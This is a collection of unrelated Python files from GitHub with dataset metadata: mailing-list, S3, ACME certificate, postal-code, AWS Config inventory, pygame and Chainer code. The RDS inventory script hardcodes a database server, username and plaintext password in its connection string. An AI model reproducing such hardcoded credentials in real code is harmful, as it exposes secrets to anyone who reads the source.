'apache.org/%s' % listkey,\n ['%s.apache.org/%s', '%s.com/%s'][base == 'apachecon'] % (base, tail),\n ]\n dirs = ['%s/%s' % (BASEDIR, d) for d in dirs]\n dirs = filter(os.path.isdir, dirs)\n dirs = filter(lambda d: d[-1] != '/', dirs) # 'community'\n if len(dirs) != 1:\n raise Skip(\"Wrong number of dirs found for %r: %r\" % (listkey, dirs))\n return dirs[0]\n\ndef process_entry(fn, op):\n j = json.load(open(fn))\n if j['version'] not in [2,3]:\n raise Skip(\"Unknown format %r\" % j['version'])\n\n availid = j['availid']\n addr = j['addr']\n listkey = j['listkey']\n\n # not sure whether leading hyphens are okay, so forbid them\n assert addr[0] in string.letters + string.digits + '_'\n\n listdir = key2dir(listkey)\n assert os.path.isabs(listdir)\n mop = '+=' if op != 'unsub' else '-='\n logging.info(\"%s@ %s %s\", listkey, mop, availid)\n subprocess.check_call([\n 'ezmlm-' + op,\n '-n',\n listdir, '.',\n addr, 'via:%s' % PROGNAME,\n ])\n listaddr = open(os.path.join(listdir, 'outlocal')).read().rstrip() + \"@\" + \\\n open(os.path.join(listdir, 'outhost')).read().rstrip()\n return Entry(listkey=listkey, availid=availid, listaddr=listaddr)\n\ndef run_hooks(entry, hooks):\n for hook in hooks:\n try:\n hook(entry)\n except Exception as e:\n # Violation of hook API.\n logging.error(\"Hook raised an exception: \"\n \"hook=(%s, %r), exception=(%s, %s)\",\n getattr(hook, 'func_name'), hook,\n type(e).__name__, e)\n\ndef main(op):\n os.chdir('APMAIL_HOME/' + op + 'req')\n success = set()\n for fn in sys.argv[1:] or glob.glob('*.json'):\n try:\n entry = process_entry(fn, op)\n except Skip as skip:\n logging.warn('Skipped %r: %s' % (fn, skip.message))\n else:\n subprocess.check_call(['svn', 'rm', '--quiet', '--', fn])\n success.add(entry)\n for entry in success:\n run_hooks(entry, HOOKS)\n mop = '+=' if op != 'unsub' else '-='\n subprocess.check_call([\n 'svn', 'commit', '--quiet', '--config-dir', SVN_CONFIG_DIR,\n '-m', 'Process requests:\\n' + '\\n'.join(sorted(\n '%s@ %s %s' % (entry.listkey, mop, entry.availid)\n for entry in success)),\n ])\n\nif __name__ == '__main__':\n main('sub')\n 
main('unsub')\n", "repo_name": "jromy5/git-clone-https-github.com-apache-infrastructure-puppet", "sub_path": "modules/qmail_asf/files/apmail/bin/subreq.py", "file_name": "subreq.py", "file_ext": "py", "file_size_in_byte": 4384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.namedtuple", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tempfile.SpooledTemporaryFile", "line_number": 32, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 79, "usage_type": "call"}, {"api_name": "string.letters", "line_number": 88, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 110, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 118, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 118, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 122, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 124, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "33112354773", "text": "import os\nfrom time import time\n\nimport boto3\n\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n\nBUCKET = 'dojo-skool-10'\nS3_IMAGES_DIRECTORY = 'src_images/'\n\n\ndef pull_last_image():\n s3 = boto3.resource('s3',\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n s3_client = boto3.client('s3')\n\n response = s3_client.list_objects(\n Bucket=BUCKET,\n Prefix=S3_IMAGES_DIRECTORY\n )\n\n last_image = response['Contents'][-1]['Key']\n image_path = 'images/traffic_{}.jpg'.format(int(time()))\n s3_client.download_file(BUCKET,\n last_image,\n image_path)\n\n\nif __name__ == '__main__':\n pull_last_image()\n", "repo_name": "paulden/dojo-terraform-ansible", "sub_path": "data_code/pull_last_file_from_bucket.py", "file_name": "pull_last_file_from_bucket.py", "file_ext": "py", "file_size_in_byte": 831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ.get", "line_number": 6, 
"usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "boto3.resource", "line_number": 14, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "17597327984", "text": "from datetime import timedelta\nfrom functools import partial\n\nfrom acme import messages\nimport attr\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom pem import Certificate, Key\nfrom twisted.application.internet import TimerService\nfrom twisted.application.service import Service\nfrom twisted.internet.defer import Deferred, gatherResults, succeed\nfrom twisted.logger import Logger\n\nfrom txacme.client import answer_challenge, fqdn_identifier, poll_until_valid\nfrom txacme.messages import CertificateRequest\nfrom txacme.util import clock_now, csr_for_names, generate_private_key, tap\n\n\nlog = Logger()\n\n\ndef _default_panic(failure, server_name):\n log.failure(\n u'PANIC! Unable to renew certificate for: {server_name!r}',\n failure, server_name=server_name)\n\n\n@attr.s(cmp=False, hash=False)\nclass AcmeIssuingService(Service):\n \"\"\"\n A service for keeping certificates up to date by using an ACME server.\n\n :param .ICertificateStore cert_store: The certificate store containing the\n certificates to manage.\n :type client_creator: Callable[[], Deferred[`txacme.client.Client`]]\n :param client_creator: A callable called with no arguments\n for creating the ACME client. For example, ``partial(Client.from_url,\n reactor=reactor, url=LETSENCRYPT_STAGING_DIRECTORY, key=acme_key,\n alg=RS256)``.\n :param clock: ``IReactorTime`` provider; usually the reactor, when not\n testing.\n\n :type responders: List[`.IResponder`]\n :param responders: Challenge responders. Usually only one responder is\n needed; if more than one responder for the same type is provided, only\n the first will be used.\n :param str email: An (optional) email address to use during registration.\n :param ~datetime.timedelta check_interval: How often to check for expiring\n certificates.\n :param ~datetime.timedelta reissue_interval: If a certificate is expiring\n in less time than this interval, it will be reissued.\n :param ~datetime.timedelta panic_interval: If a certificate is expiring in\n less time than this interval, and reissuing fails, the panic callback\n will be invoked.\n\n :type panic: Callable[[Failure, `str`], Deferred]\n :param panic: A callable invoked with the failure and server name when\n reissuing fails for a certificate expiring in the ``panic_interval``.\n For example, you could generate a monitoring alert. The default\n callback logs a message at *CRITICAL* level.\n :param generate_key: A 0-arg callable used to generate a private key for a\n new cert. 
Normally you would not pass this unless you have specialized\n key generation requirements.\n \"\"\"\n cert_store = attr.ib()\n _client_creator = attr.ib()\n _clock = attr.ib()\n _responders = attr.ib()\n _email = attr.ib(default=None)\n check_interval = attr.ib(default=timedelta(days=1))\n reissue_interval = attr.ib(default=timedelta(days=30))\n panic_interval = attr.ib(default=timedelta(days=15))\n _panic = attr.ib(default=_default_panic)\n _generate_key = attr.ib(default=partial(generate_private_key, u'rsa'))\n\n _waiting = attr.ib(default=attr.Factory(list), init=False)\n _issuing = attr.ib(default=attr.Factory(dict), init=False)\n ready = False\n\n def _now(self):\n \"\"\"\n Get the current time.\n \"\"\"\n return clock_now(self._clock)\n\n def _check_certs(self):\n \"\"\"\n Check all of the certs in the store, and reissue any that are expired\n or close to expiring.\n \"\"\"\n log.info('Starting scheduled check for expired certificates.')\n\n def check(certs):\n panicing = set()\n expiring = set()\n for server_name, objects in certs.items():\n if len(objects) == 0:\n panicing.add(server_name)\n for o in filter(lambda o: isinstance(o, Certificate), objects):\n cert = x509.load_pem_x509_certificate(\n o.as_bytes(), default_backend())\n until_expiry = cert.not_valid_after - self._now()\n if until_expiry <= self.panic_interval:\n panicing.add(server_name)\n elif until_expiry <= self.reissue_interval:\n expiring.add(server_name)\n\n log.info(\n 'Found {panicing_count:d} overdue / expired and '\n '{expiring_count:d} expiring certificates.',\n panicing_count=len(panicing),\n expiring_count=len(expiring))\n\n d1 = (\n gatherResults(\n [self._with_client(self._issue_cert, server_name)\n .addErrback(self._panic, server_name)\n for server_name in panicing],\n consumeErrors=True)\n .addCallback(done_panicing))\n d2 = gatherResults(\n [self.issue_cert(server_name)\n .addErrback(\n lambda f: log.failure(\n u'Error issuing certificate for: {server_name!r}',\n f, server_name=server_name))\n for server_name in expiring],\n consumeErrors=True)\n return gatherResults([d1, d2], consumeErrors=True)\n\n def done_panicing(ignored):\n self.ready = True\n for d in list(self._waiting):\n d.callback(None)\n self._waiting = []\n\n return (\n self._ensure_registered()\n .addCallback(lambda _: self.cert_store.as_dict())\n .addCallback(check)\n .addErrback(\n lambda f: log.failure(\n u'Error in scheduled certificate check.', f)))\n\n def issue_cert(self, server_name):\n \"\"\"\n Issue a new cert for a particular name.\n\n If an existing cert exists, it will be replaced with the new cert. 
If\n issuing is already in progress for the given name, a second issuing\n process will *not* be started.\n\n :param str server_name: The name to issue a cert for.\n\n :rtype: ``Deferred``\n :return: A deferred that fires when issuing is complete.\n \"\"\"\n def finish(result):\n _, waiting = self._issuing.pop(server_name)\n for d in waiting:\n d.callback(result)\n\n # d_issue is assigned below, in the conditional, since we may be\n # creating it or using the existing one.\n d = Deferred(lambda _: d_issue.cancel())\n if server_name in self._issuing:\n d_issue, waiting = self._issuing[server_name]\n waiting.append(d)\n else:\n d_issue = self._with_client(self._issue_cert, server_name)\n waiting = [d]\n self._issuing[server_name] = (d_issue, waiting)\n # Add the callback afterwards in case we're using a client\n # implementation that isn't actually async\n d_issue.addBoth(finish)\n return d\n\n def _with_client(self, f, *a, **kw):\n \"\"\"\n Construct a client, and perform an operation with it.\n \"\"\"\n return self._client_creator().addCallback(f, *a, **kw)\n\n def _issue_cert(self, client, server_name):\n \"\"\"\n Issue a new cert for a particular name.\n \"\"\"\n log.info(\n 'Requesting a certificate for {server_name!r}.',\n server_name=server_name)\n key = self._generate_key()\n objects = [\n Key(key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption()))]\n\n def answer_and_poll(authzr):\n def got_challenge(stop_responding):\n return (\n poll_until_valid(authzr, self._clock, client)\n .addBoth(tap(lambda _: stop_responding())))\n return (\n answer_challenge(authzr, client, self._responders)\n .addCallback(got_challenge))\n\n def got_cert(certr):\n objects.append(\n Certificate(\n x509.load_der_x509_certificate(\n certr.body, default_backend())\n .public_bytes(serialization.Encoding.PEM)))\n return certr\n\n def got_chain(chain):\n for certr in chain:\n got_cert(certr)\n log.info(\n 'Received certificate for {server_name!r}.',\n server_name=server_name)\n return objects\n\n return (\n client.request_challenges(fqdn_identifier(server_name))\n .addCallback(answer_and_poll)\n .addCallback(lambda ign: client.request_issuance(\n CertificateRequest(\n csr=csr_for_names([server_name], key))))\n .addCallback(got_cert)\n .addCallback(client.fetch_chain)\n .addCallback(got_chain)\n .addCallback(partial(self.cert_store.store, server_name)))\n\n def _ensure_registered(self):\n \"\"\"\n Register if needed.\n \"\"\"\n if self._registered:\n return succeed(None)\n else:\n return self._with_client(self._register)\n\n def _register(self, client):\n \"\"\"\n Register and agree to the TOS.\n \"\"\"\n def _registered(regr):\n self._regr = regr\n self._registered = True\n regr = messages.NewRegistration.from_data(email=self._email)\n return (\n client.register(regr)\n .addCallback(client.agree_to_tos)\n .addCallback(_registered))\n\n def when_certs_valid(self):\n \"\"\"\n Get a notification once the startup check has completed.\n\n When the service starts, an initial check is made immediately; the\n deferred returned by this function will only fire once reissue has been\n attempted for any certificates within the panic interval.\n\n .. 
note:: The reissue for any of these certificates may not have been\n successful; the panic callback will be invoked for any certificates\n in the panic interval that failed reissue.\n\n :rtype: ``Deferred``\n :return: A deferred that fires once the initial check has resolved.\n \"\"\"\n if self.ready:\n return succeed(None)\n d = Deferred()\n self._waiting.append(d)\n return d\n\n def startService(self):\n Service.startService(self)\n self._registered = False\n self._timer_service = TimerService(\n self.check_interval.total_seconds(), self._check_certs)\n self._timer_service.clock = self._clock\n self._timer_service.startService()\n\n def stopService(self):\n Service.stopService(self)\n self.ready = False\n self._registered = False\n for d in list(self._waiting):\n d.cancel()\n self._waiting = []\n return self._timer_service.stopService()\n\n\n__all__ = ['AcmeIssuingService']\n", "repo_name": "markrwilliams/txacme", "sub_path": "src/txacme/service.py", "file_name": "service.py", "file_ext": "py", "file_size_in_byte": 11242, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "twisted.logger.Logger", "line_number": 20, "usage_type": "call"}, {"api_name": "twisted.application.service.Service", "line_number": 30, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 66, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 67, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 68, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 69, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 70, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 71, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 72, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 72, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 73, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 73, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 74, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 75, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 75, "usage_type": "call"}, {"api_name": "txacme.util.generate_private_key", "line_number": 75, "usage_type": "argument"}, {"api_name": "attr.ib", "line_number": 77, "usage_type": "call"}, {"api_name": "attr.Factory", "line_number": 77, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 78, "usage_type": "call"}, {"api_name": "attr.Factory", "line_number": 78, "usage_type": "call"}, {"api_name": "txacme.util.clock_now", "line_number": 85, "usage_type": "call"}, {"api_name": "pem.Certificate", "line_number": 100, "usage_type": "argument"}, {"api_name": "cryptography.x509.load_pem_x509_certificate", "line_number": 101, "usage_type": "call"}, {"api_name": "cryptography.x509", "line_number": 101, "usage_type": "name"}, {"api_name": "cryptography.hazmat.backends.default_backend", "line_number": 102, "usage_type": "call"}, {"api_name": "twisted.internet.defer.gatherResults", "line_number": 116, "usage_type": "call"}, {"api_name": "twisted.internet.defer.gatherResults", "line_number": 122, "usage_type": "call"}, {"api_name": "twisted.internet.defer.gatherResults", "line_number": 130, "usage_type": "call"}, {"api_name": "twisted.internet.defer.Deferred", "line_number": 166, "usage_type": "call"}, {"api_name": "pem.Key", "line_number": 194, "usage_type": "call"}, 
{"api_name": "cryptography.hazmat.primitives.serialization.Encoding", "line_number": 195, "usage_type": "attribute"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 195, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.serialization.PrivateFormat", "line_number": 196, "usage_type": "attribute"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 196, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.serialization.NoEncryption", "line_number": 197, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 197, "usage_type": "name"}, {"api_name": "txacme.client.poll_until_valid", "line_number": 202, "usage_type": "call"}, {"api_name": "txacme.util.tap", "line_number": 203, "usage_type": "call"}, {"api_name": "txacme.client.answer_challenge", "line_number": 205, "usage_type": "call"}, {"api_name": "pem.Certificate", "line_number": 210, "usage_type": "call"}, {"api_name": "cryptography.x509.load_der_x509_certificate", "line_number": 211, "usage_type": "call"}, {"api_name": "cryptography.x509", "line_number": 211, "usage_type": "name"}, {"api_name": "cryptography.hazmat.backends.default_backend", "line_number": 212, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.serialization.Encoding", "line_number": 213, "usage_type": "attribute"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 213, "usage_type": "name"}, {"api_name": "txacme.client.fqdn_identifier", "line_number": 225, "usage_type": "call"}, {"api_name": "txacme.messages.CertificateRequest", "line_number": 228, "usage_type": "call"}, {"api_name": "txacme.util.csr_for_names", "line_number": 229, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 233, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 240, "usage_type": "call"}, {"api_name": "acme.messages.NewRegistration.from_data", "line_number": 251, "usage_type": "call"}, {"api_name": "acme.messages.NewRegistration", "line_number": 251, "usage_type": "attribute"}, {"api_name": "acme.messages", "line_number": 251, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 273, "usage_type": "call"}, {"api_name": "twisted.internet.defer.Deferred", "line_number": 274, "usage_type": "call"}, {"api_name": "twisted.application.service.Service.startService", "line_number": 279, "usage_type": "call"}, {"api_name": "twisted.application.service.Service", "line_number": 279, "usage_type": "name"}, {"api_name": "twisted.application.internet.TimerService", "line_number": 281, "usage_type": "call"}, {"api_name": "twisted.application.service.Service.stopService", "line_number": 287, "usage_type": "call"}, {"api_name": "twisted.application.service.Service", "line_number": 287, "usage_type": "name"}, {"api_name": "attr.s", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "17935643778", "text": "#!/usr/bin/python3\n\n\n# 郵便番号で住所を出す\nimport requests, json\n\n\n# api\ndef getURL(post_code):\n return 'http://zipcloud.ibsnet.co.jp/api/search?zipcode={}'.format(post_code)\n\n\n# Jsonを読む\ndef readJson(url):\n r = requests.get(url)\n data = json.loads(r.text)\n return data\n\n\n# 情報を取得\ndef getInfo(data):\n if not (data['results'] == None):\n return [data['results'][0]['zipcode'],\n data['results'][0]['address1'],\n data['results'][0]['address2'],\n data['results'][0]['address3']]\n else:\n return 'Nothing'\n\n\n# 最終的な表示\ndef showInfo(info):\n if not 
(info == 'Nothing'):\n display('郵便番号{}は{}{}{}です.'.format(info[0], info[1], info[2], info[3]))\n else:\n display('その郵便番号は存在しません.')\n\n\n# 表示\ndef display(d):\n print(d)\n\n\n# 実行\nif __name__ == '__main__':\n while True:\n try:\n post_code = int(input('郵便番号を入力してください(例1234567): '))\n showInfo(getInfo(readJson(getURL(post_code))))\n break\n except ValueError:\n display('ERROR')\n break\n", "repo_name": "n18001/life_hack", "sub_path": "post_code.py", "file_name": "post_code.py", "file_ext": "py", "file_size_in_byte": 1189, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "27533644479", "text": "import json\nfrom pprint import pprint\nimport boto3\nimport pyodbc\nimport os\nimport gzip\nimport shutil\nimport subprocess as sp\n\n\nserver='SD-AE79-EF8E\\HCSQLSERVER1,2431'\ndatabase='hybrid_cloud'\nusername = 'testuser'\npassword ='TestingSQL@1234'\ndriver = '/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.2.so.0.1'\nconnection = pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=2431;DATABASE='+database+';UID='+username+';PWD='+password)\ncursor = connection.cursor()\nbucket = \"config-bucket-528884874493\"\nwork_dir = \"\"\n\n\ndef download_objects(bucket, work_dir):\n command = \"aws s3 cp --recursive s3://%s %s\" %(bucket, work_dir)\n sp.Popen(command).wait()\n print('All Objects Downloaded')\n\ndef get_all_file_paths(directory): \n \n # initializing empty file paths list \n file_paths = [] \n \n # crawling through directory and subdirectories \n for root, directories, files in os.walk(directory): \n for filename in files: \n # join the two strings in order to form the full filepath. 
\n filepath = os.path.join(root, filename) \n file_paths.append(filepath) \n \n # returning all file paths \n return file_paths\n\ndef unzip_files(file_paths):\n for files in file_paths:\n if files.endswith('.gz'):\n with gzip.open(files, 'rb') as f_in:\n file_name_json = files[0:-3]\n with open(file_name_json, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n os.remove(files)\n\ndef main():\n download_objects(bucket, work_dir)\n file_paths = get_all_file_paths('.')\n unzip_files(file_paths)\n file_paths2 = get_all_file_paths('.')\n for file in file_paths2:\n if file.endswith('.json'):\n with open (file, 'r') as json_file:\n try:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n new_dict = {}\n for i in json_str:\n new_dict['dBInstanceIdentifier'] = i['configuration']['dBInstanceIdentifier']\n new_dict['dBInstanceClass'] = i['configuration']['dBInstanceClass']\n new_dict['dBInstanceStatus'] = i['configuration']['dBInstanceStatus']\n new_dict['dbiResourceId'] = i['configuration']['dbiResourceId']\n new_dict['configurationItemCaptureTime'] = i['configurationItemCaptureTime']\n new_dict['dBInstanceArn'] = i['configuration']['dBInstanceArn']\n new_dict['instanceCreateTime'] = i['configuration']['instanceCreateTime']\n new_dict['resourceId'] = i['resourceId']\n new_dict['awsAccountId'] = i['awsAccountId']\n try:\n cursor.execute(\"insert into Inventory_awsrds(resourceId, dBInstanceClass, dBInstanceStatus, configurationItemCaptureTime, dBInstanceArn, dBInstanceIdentifier) values (?,?,?,?,?,?)\",str(new_dict['resourceId']),str(new_dict['dBInstanceClass']),str(new_dict['dBInstanceStatus']),str(new_dict['configurationItemCaptureTime']),str(new_dict['dBInstanceArn']),str(new_dict['dBInstanceIdentifier']))\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n os.remove(file)\n\nmain()\nconnection.commit()\nconnection.close()\n#file = \"546156050725_Config_us-east-1_ConfigHistory_AWS__RDS__DBInstance_20190122T113622Z_20190122T113622Z_1.json\"\n#with open (file, 'r') as json_file:\n #json_obj = json.load(json_file)\n #json_str = json_obj['configurationItems']\n #for i in json_str:\n #print(i['configurationItemCaptureTime'])\n #break\n\n", "repo_name": "the-indian-saint/AWS-Scripts", "sub_path": "DynamoDB/Working/rds.py", "file_name": "rds.py", "file_ext": "py", "file_size_in_byte": 3781, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyodbc.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 24, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 45, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 48, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 60, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "18163344335", "text": "import pygame\nimport pygame.locals\nfrom .elevator import Elevator\n\npygame.init()\n\n\nclass ElevatorUI:\n background = pygame.Color(\"white\")\n elevator_image = None\n\n def __init__(self, ui, elevator: Elevator, rect):\n self.ui = ui\n self.elevator = elevator\n self.rect = rect\n if self.elevator_image is None:\n 
self.elevator_image = pygame.transform.scale(\n pygame.image.load(\"images/elevator.png\"),\n (self.rect.width - 10, self.rect.width - 10)\n )\n\n def draw(self, surface):\n pygame.draw.rect(surface, self.background, self.rect)\n\n elevation = self.elevator.elevation/self.ui.controller.floors[-1].elevation\n elevator_rect = self.elevator_image.get_rect()\n x = self.rect.left + 5\n y = self.rect.top + int((self.rect.height-elevator_rect.height)*(1-elevation))\n surface.blit(self.elevator_image, elevator_rect.move(x, y))\n\n def click(self, surface, point):\n pass\n", "repo_name": "xajohnson/pyelevator", "sub_path": "pyelevator/elevatorui.py", "file_name": "elevatorui.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 9, "usage_type": "call"}, {"api_name": "elevator.Elevator", "line_number": 12, "usage_type": "name"}, {"api_name": "pygame.transform.scale", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "9578343711", "text": "# To define an enumerated type, define a class; each constant is then a unique instance of that class. Python provides the Enum class for this\r\n\r\nfrom enum import Enum\r\n\r\nMonth = Enum('Month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\r\n\r\n# This gives an enumeration class of type Month; a constant can be referenced directly as Month.Jan, and all its members can be enumerated:\r\nfor name, member in Month.__members__.items():\r\n print(name, '=>', member, ',', member.value) # the value attribute is an int constant automatically assigned to each member, counting from 1 by default.\r\n\r\n\r\nfrom enum import Enum, unique # for more precise control over the enumeration, derive a custom class from Enum:\r\n\r\n\r\n@unique # the @unique decorator helps us check that no values are duplicated\r\nclass Weekday(Enum):\r\n Sun = 0\r\n Mon = 1\r\n Tue = 2\r\n Wed = 3\r\n Thu = 4\r\n Fri = 5\r\n Sat = 6\r\n\r\n# These enumeration members can be accessed in several ways: a constant can be referenced by member name, or obtained directly from its value.\r\nday1 = Weekday.Mon\r\n\r\nprint('day1 =', day1)\r\nprint('Weekday.Tue =', Weekday.Tue)\r\nprint('Weekday[\\'Tue\\'] =', Weekday['Tue'])\r\nprint('Weekday.Tue.value =', Weekday.Tue.value)\r\nprint('day1 == Weekday.Mon ?', day1 == Weekday.Mon)\r\nprint('day1 == Weekday.Tue ?', day1 == Weekday.Tue)\r\nprint('day1 == Weekday(1) ?', day1 == Weekday(1))\r\n\r\nfor name, member in Weekday.__members__.items():\r\n print(name, '=>', member)", "repo_name": "zx-feishang/LearningPython3-begin-", "sub_path": "6 OOP/O15enum_class.py", "file_name": "O15enum_class.py", "file_ext": "py", "file_size_in_byte": 1472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "enum.Enum", "line_number": 5, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 16, "usage_type": "name"}, {"api_name": "enum.unique", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "40041493556", "text": "#!/usr/bin/env python\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport chainer\nimport numpy as np\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import Variable, Chain, ChainList\nimport six\n\nfrom nmt_chainer.models.feedforward.utils import (\n
generate_pos_vectors, make_batch_mask, pad_data, FeedForward, apply_linear_layer_to_last_dims, cut_minibatch)\nfrom nmt_chainer.models.feedforward.multi_attention import AddAndNormalizedSelfAttentionLayer, AddAndNormalizedCrossAttentionLayer\n\nimport logging\nlogging.basicConfig()\nlog = logging.getLogger(\"ff:dec\")\nlog.setLevel(logging.INFO)\n\nclass DecoderLayer(Chain):\n def __init__(self, d_model, n_heads, d_ff=2048, experimental_relu=False, dropout=None,\n residual_mode=\"normal\", no_normalize=False):\n super(DecoderLayer, self).__init__(\n ff_layer = FeedForward(d_model, d_ff=d_ff, dropout=dropout, residual_mode=residual_mode, no_normalize=no_normalize),\n self_attention_layer = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n experimental_relu=experimental_relu,\n dropout=dropout, residual_mode=residual_mode, no_normalize=no_normalize),\n \n cross_attention_layer = AddAndNormalizedCrossAttentionLayer(d_model=d_model, n_heads=n_heads,\n experimental_relu=experimental_relu,\n dropout=dropout, \n residual_mode=residual_mode if residual_mode != \"none\" else \"normal\", no_normalize=no_normalize) # It does not seem good to let the cross attention be bypassed\n )\n \n self.n_heads = n_heads\n self.d_model = d_model\n \n def __call__(self, tgt, src, mask, mask_input):\n y1 = self.self_attention_layer(tgt, mask)\n y2 = self.cross_attention_layer(y1, src, mask_input)\n y3 = self.ff_layer(y2)\n return y3\n \n def one_step(self, new_inpt, prev_states, src, mask_input):\n mb_size_inpt, nQ_inpt, d_model_inpt = new_inpt.data.shape\n assert nQ_inpt == 1\n assert d_model_inpt == self.d_model\n \n mb_size_mask_input, n_heads_mask_input, nQ_mask_input, nV_mask_input = mask_input.shape\n assert 